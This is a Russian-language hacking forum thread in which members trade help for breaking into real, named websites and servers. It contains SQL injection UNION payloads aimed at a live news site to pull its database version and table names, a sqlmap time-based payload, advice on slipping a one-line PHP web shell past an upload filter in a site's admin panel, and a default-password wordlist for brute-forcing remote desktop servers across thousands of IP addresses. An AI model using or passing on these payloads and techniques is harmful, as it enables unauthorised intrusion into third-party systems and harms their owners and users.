Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Проблема в отсутствии знаний.
    http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,version(),4,5,6--%20a&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode=allwords&SectionID=-1&Lang=_Ru
     
    1 person likes this.
  2. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    опять ничего(
     
    #22982 2fed, 26 Jan 2014
    Last edited: 26 Jan 2014
  3. T.G.K

    T.G.K Banned

    Joined:
    12 Sep 2013
    Messages:
    17
    Likes Received:
    7
    Reputations:
    12
    Что можно сделать с этим: http://rp-gameworld.ru/index.php?c=registration&action=reg
    или http://rp-gameworld.ru/?c=search
     
    1 person likes this.
  4. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    Host IP: 90.156.201.28
    Web Server: Microsoft-IIS/8.0у
    Powered-by: ASP.NET
    Keyword Found: Не
    I guess injection type is Integer?! If injection failed, retry with a manual keyword.
    DB Server: MySQL
    Finding columns count(MySQL,MsSQL 2005): 1

    и всё ничего не находит.
     
  5. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Не через мозилу открывай.
    [​IMG]
     
    _________________________
  6. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    а что на счет
    http://aztexnika.az/uppload.php

    http://aztexnika.az/admin/uppload.php
     
  7. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    да уж

    причем тут мозилла ?))
     
  8. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,(select/**/unhex(hex(table_name))/**/from/**/information_schema.tables/**/limit/**/0,1),4,5,6-- a&submit=Искать&mode=allwords&SectionID=-1&Lang=_Ru
     
  9. salevan

    salevan New Member

    Joined:
    24 Jan 2014
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    здравствуйте.
    вопрос в следующем. у меня интернет соединение 20кб/с. с таким интернетом дедик юзать не актуально ,как я понимаю(поправьте, если не прав). собственно вопрос, как обезопасить себя. виртуалка? торы? что сделать. простите, на форуме очень много воды, искать нужную информацию просто нет времени.
     
  10. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Ребята, прошу, скажите что такое payload и как его задать в ручную в sqlmap(
    Если Payload: '"%2bSLEEP(15)--
    То --prefix=""%2b"
    Так? если так то не идет всеравно
     
  11. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Тебе дали готовый запрос к sqlmap, просто скопируй и вставь в терминал.
     
  12. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Я бы не просил объяснить если работало бы. Дело в том что и не получается.
     
  13. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    как найти полный путь к корню сайта
     
  14. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    phpinfo, ошибки php, подбор пути, исходя из параметров сервера
     
  15. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    возможно ли провести иньекцыю в запросе
    ошибка получается в запросе
    дайте напутствие господа форумчане заранее благодарен
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Да, надо только закончить логическую структуру запроса!

    К примеру:
    SELECT DISTINCT forum.title from forum AS
    forum WHERE forumid IN (2
    ) and 1=1 -- )
     
    _________________________
  17. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    В админке есть заливка файлов, надо залить шелл. При попытке залить походу срабатывает что-то типо антивирусника или фаервола(заливаю чистый пхп с шеллом-не льется, заливаю пхп файл с phpinfo() - все спокойно выдает).
    Че делать?
     
  18. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    попробуй залить

    <?system($_GET[cmd])?> или passthru(), или exec() вместо system()
    будет доступен:
    shell.php?cmd=uname
     
  19. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Знаю, что вопрос немного не по теме, но подходящей я не нашёл.
    Есть ли шанс сбрутить дедик с логинами
    Code:
    Administrator
    admin
    и пасами
    Code:
    administrator
    admin
    password
    pass
    p@ssword
    passw0rd
    p@ssw0rd
    1
    12
    123
    1234
    12345
    123456
    0
    00
    000
    0000
    00000
    support
    123456
    У меня 3000 ip-шников. Или словарь надо больше и я впустую потрачу время?
     
  20. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10

    Вопрос все еще интересен, совет юзера выше не помог :(
    выдает при таком коде вот что:

    Code:
    Warning: system() [function.system]: Cannot execute a blank command in тутпуть/wso2.php on line 1
     
Thread Status:
Not open for further replies.